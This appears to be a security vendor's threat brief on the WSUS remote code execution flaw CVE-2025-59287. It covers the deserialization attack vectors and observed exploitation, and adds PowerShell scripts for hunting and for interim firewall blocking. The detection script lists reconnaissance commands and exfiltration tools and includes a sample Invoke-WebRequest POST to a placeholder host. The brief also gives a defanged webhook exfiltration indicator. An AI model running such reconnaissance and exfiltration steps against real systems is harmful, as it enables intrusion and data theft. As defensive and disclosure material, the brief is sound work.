On October 14, 2025, a significant vulnerability was discovered in Microsoft’s Windows Server Update Services (WSUS), a vital tool for managing software updates in enterprise environments. This critical remote code execution (RCE) vulnerability, designated CVE-2025-59287, was initially addressed by Microsoft during its October Patch Tuesday. The initial patch proved insufficient, however, prompting an urgent out-of-band security update on October 23, 2025. Security researchers, including Unit 42, observed active exploitation attempts shortly after the emergency patch was released, which makes this a pressing and serious risk for affected organizations.
Key Details of the Vulnerability
- Vulnerability: Critical Remote Code Execution (RCE) in WSUS, with a CVSS score of 9.8.
- Impact: This flaw enables a remote, unauthenticated attacker to execute arbitrary code with system privileges on vulnerable servers.
- Status: Actively exploited, with threat actors detected exploiting the vulnerability within hours of the emergency patch release.
- Urgency: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) included this vulnerability in its Known Exploited Vulnerabilities (KEV) Catalog on October 24, emphasizing the immediate threat it poses.
For organizations unable to apply the emergency patches without delay, Microsoft has suggested temporary workarounds to mitigate the risk. Palo Alto Networks customers benefit from enhanced protection against activities related to CVE-2025-59287 through various products and services, including the expertise of the Unit 42 Incident Response team, which can assist with incident response and proactive risk assessments.
Understanding CVE-2025-59287
WSUS serves as a cornerstone for IT administrators, facilitating the centralized management and distribution of Microsoft updates across corporate networks. Its role as a trusted source for software patches makes it an attractive target for attackers. A successful compromise of a WSUS server can lead to lateral movement and extensive network infiltration.
The vulnerability arises from an “unsafe deserialization of untrusted data.” Researchers have identified multiple attack vectors, including sending crafted requests to the GetCookie() endpoint, which leads to improper deserialization of an AuthorizationCookie object via the insecure BinaryFormatter. Another vector involves the ReportingWebService, where unsafe deserialization is triggered through SoapFormatter. In both scenarios, a remote, unauthenticated attacker can manipulate the system into executing malicious code with elevated privileges.
The vulnerability specifically affects systems with the WSUS role enabled:
- Affected Software: Microsoft Windows Server 2012, 2012 R2, 2016, 2019, 2022 (including 23H2 Edition), and 2025.
- Required Condition: The vulnerability affects only servers with the WSUS Server Role enabled, which is not installed by default.
Current Exploitation Landscape
Following the public disclosure of a proof-of-concept exploit, Unit 42 and other security firms observed a surge in active scanning and exploitation attempts. Their analysis indicates a consistent methodology focused on gaining initial access and conducting internal reconnaissance.
- Initial Access: Attackers are targeting publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
- Execution: Malicious PowerShell commands are spawned from WSUS-related parent processes; the forensic process chains observed include wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.
- Reconnaissance: The initial payload executes commands to gather intelligence on the internal network, including whoami, net user /domain, and ipconfig /all. This command set is designed to quickly map the internal domain structure and identify high-value user accounts, providing attackers with a roadmap for lateral movement.
- Data Exfiltration: The collected information is exfiltrated to a remote, attacker-controlled endpoint by a PowerShell payload that first attempts Invoke-WebRequest and falls back to curl.exe if that fails.
Approximately 5,500 WSUS instances have been identified as exposed to the internet, illustrating the global attack surface. This reconnaissance-focused tactic suggests that initial exploitation is merely a precursor to broader network compromise, making immediate remediation and threat hunting essential.
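The process chains, reconnaissance commands and exfiltration tooling listed above translate directly into a hunt. The following PowerShell is an added example written for this page, not Unit 42's XQL query and not Cortex XDR logic; it walks parent links over constructed process-creation records (the field names Pid, ParentPid, Image and CommandLine, the PIDs and the placeholder URL are all assumptions) and flags powershell.exe whose ancestry starts at wsusservice.exe or w3wp.exe. Sysmon Event ID 1 or Security 4688 events mapped to those four fields can be fed to the same function.

```powershell
# Added example for CVE-2025-59287 hunting; not Unit 42's XQL query.
# Field names (Pid, ParentPid, Image, CommandLine) are assumptions; map your
# Sysmon EID 1 / Security 4688 telemetry to them before running at scale.

# Root processes of the chains described in the brief.
$ChainRoots    = @('wsusservice.exe', 'w3wp.exe')
# Reconnaissance and exfiltration strings the brief reports.
$ReconPatterns = @('whoami', 'net user /domain', 'ipconfig /all')
$ExfilPatterns = @('Invoke-WebRequest', 'curl.exe')

function Get-ProcessChain {
    # Walk ParentPid links upward; return lower-cased image names, root first.
    param([hashtable]$ByPid, [int]$ProcessId)
    $chain   = @()
    $seen    = @{}
    $current = $ByPid[$ProcessId]
    while ($null -ne $current -and -not $seen.ContainsKey($current.Pid)) {
        $seen[$current.Pid] = $true
        $chain   = @([IO.Path]::GetFileName($current.Image).ToLower()) + $chain
        $current = $ByPid[$current.ParentPid]
    }
    return $chain
}

function Find-WsusExploitActivity {
    # Flag powershell.exe whose ancestry begins at a WSUS-related process;
    # raise severity when recon or exfil strings appear on the command line.
    param([object[]]$Events)
    $byPid = @{}
    foreach ($e in $Events) { $byPid[$e.Pid] = $e }

    $hits = @()
    foreach ($e in $Events) {
        if ([IO.Path]::GetFileName($e.Image).ToLower() -ne 'powershell.exe') { continue }
        $chain = Get-ProcessChain -ByPid $byPid -ProcessId $e.Pid
        if ($ChainRoots -notcontains $chain[0]) { continue }

        $cmd      = [string]$e.CommandLine
        $recon    = @($ReconPatterns | Where-Object { $cmd -like "*$_*" })
        $exfil    = @($ExfilPatterns | Where-Object { $cmd -like "*$_*" })
        $severity = 'Medium'   # any WSUS-rooted PowerShell deserves a look
        if ($recon.Count -gt 0 -or $exfil.Count -gt 0) { $severity = 'High' }

        $hits += [pscustomobject]@{
            Pid      = $e.Pid
            Chain    = ($chain -join ' -> ')
            Recon    = ($recon -join ', ')
            Exfil    = ($exfil -join ', ')
            Severity = $severity
        }
    }
    return $hits
}

# Constructed sample records (not real telemetry). The first chain mirrors the
# wsusservice.exe variant from the brief, the second the w3wp.exe variant, and
# the last is ordinary admin use that must not fire.
$sample = @(
    [pscustomobject]@{ Pid=4000; ParentPid=600;  Image='C:\Program Files\Update Services\Service\WsusService.exe'; CommandLine='WsusService.exe' }
    [pscustomobject]@{ Pid=4010; ParentPid=4000; Image='C:\Windows\System32\cmd.exe';                               CommandLine='cmd.exe /c cmd.exe' }
    [pscustomobject]@{ Pid=4020; ParentPid=4010; Image='C:\Windows\System32\cmd.exe';                               CommandLine='cmd.exe /c powershell.exe' }
    [pscustomobject]@{ Pid=4030; ParentPid=4020; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -c "whoami; net user /domain; ipconfig /all"' }
    [pscustomobject]@{ Pid=5000; ParentPid=700;  Image='C:\Windows\System32\inetsrv\w3wp.exe';                      CommandLine='w3wp.exe -ap "WsusPool"' }
    [pscustomobject]@{ Pid=5010; ParentPid=5000; Image='C:\Windows\System32\cmd.exe';                               CommandLine='cmd.exe /c cmd.exe' }
    [pscustomobject]@{ Pid=5020; ParentPid=5010; Image='C:\Windows\System32\cmd.exe';                               CommandLine='cmd.exe /c powershell.exe' }
    [pscustomobject]@{ Pid=5030; ParentPid=5020; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -c "Invoke-WebRequest -Uri http://placeholder.invalid/ -Method POST"' }
    [pscustomobject]@{ Pid=6000; ParentPid=800;  Image='C:\Windows\explorer.exe';                                   CommandLine='explorer.exe' }
    [pscustomobject]@{ Pid=6010; ParentPid=6000; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -c "Get-WsusServer"' }
)

# Expected: two High hits (PIDs 4030 and 5030), nothing for PID 6010.
Find-WsusExploitActivity -Events $sample | Format-Table -AutoSize
```

The ancestry check carries the signal: Invoke-WebRequest and whoami are common in legitimate administration, but neither the WSUS service nor the IIS worker process hosting it should be spawning command shells, so even a Medium hit with no recon strings is worth triage. The exfiltration string matching is deliberately loose; tighten it with the IoC listed at the end of this brief once your telemetry confirms the pattern.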
Interim Recommendations
For organizations unable to deploy emergency patches immediately, Microsoft has recommended temporary workarounds to mitigate risk until full patching can be accomplished. As of October 27, the interim guidance includes:
- Disable the WSUS Server Role: Disabling the WSUS role eliminates the attack vector entirely, though it will prevent the server from managing and distributing updates to client systems.
- Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 at the host-level firewall. This action removes the attack vector but will also prevent the server from managing and distributing updates.
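Both workarounds can be applied from an elevated PowerShell session on the WSUS server. The script below is an added example written for this page, not Microsoft's or Unit 42's guidance verbatim: it first confirms the WSUS role is present (the CVE does not apply otherwise), adds a host-firewall block for inbound TCP 8530 and 8531, leaves the role removal commented out so it cannot run by accident, and shows what is still listening. The rule display name is constructed; the feature name UpdateServices is the Server Manager name for the WSUS role.

```powershell
# Added example of the two interim workarounds from the brief; run elevated on
# the WSUS server. Not Microsoft's or Unit 42's own script.

# 1. The vulnerability only applies if the WSUS role is installed.
$wsus = Get-WindowsFeature -Name UpdateServices
if (-not $wsus.Installed) {
    Write-Host 'WSUS role not installed; CVE-2025-59287 does not apply to this host.'
    return
}

# 2. Workaround A: block inbound TCP 8530/8531 at the host firewall.
#    Trade-off from the brief: clients can no longer reach this server for
#    updates until the rule is removed after patching. If WSUS was configured
#    on non-default ports, adjust -LocalPort accordingly.
$ruleName = 'Block inbound WSUS 8530/8531 (CVE-2025-59287 interim)'   # constructed name
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
        -LocalPort 8530, 8531 -Action Block -Profile Any -Enabled True | Out-Null
    Write-Host "Created firewall rule: $ruleName"
} else {
    Write-Host "Firewall rule already present: $ruleName"
}

# 3. Workaround B: remove the WSUS role entirely. Left commented out so this
#    script never uninstalls WSUS unintentionally; uncomment to apply.
# Uninstall-WindowsFeature -Name UpdateServices -Restart:$false

# 4. Show what still listens on the WSUS ports. Listeners remain while the role
#    is installed; the firewall rule above is what stops inbound reachability.
Get-NetTCPConnection -State Listen -LocalPort 8530, 8531 -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess
```

Once the out-of-band update is installed, remove the rule with Remove-NetFirewallRule -DisplayName using the same name, or reinstall the role with Install-WindowsFeature UpdateServices if Workaround B was used; neither workaround replaces patching.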
Managed Threat Hunting Queries
The Unit 42 Managed Threat Hunting team is actively monitoring attempts to exploit this CVE across our Managed Services customers, utilizing telemetry available within Cortex XDR. Customers who do not leverage Unit 42 Managed Services can also utilize the following XQL query to search for signs of exploitation:
Indicators of Compromise
- hxxp://webhook[.]site/22b6b8c8-2e07-4878-a681-b772e569aa6a
Updated October 27, 2025, at 1:50 p.m. PT to revise Cortex product protection language.
Updated October 27, 2025, at 2:37 p.m. PT to include Managed Threat Hunting queries.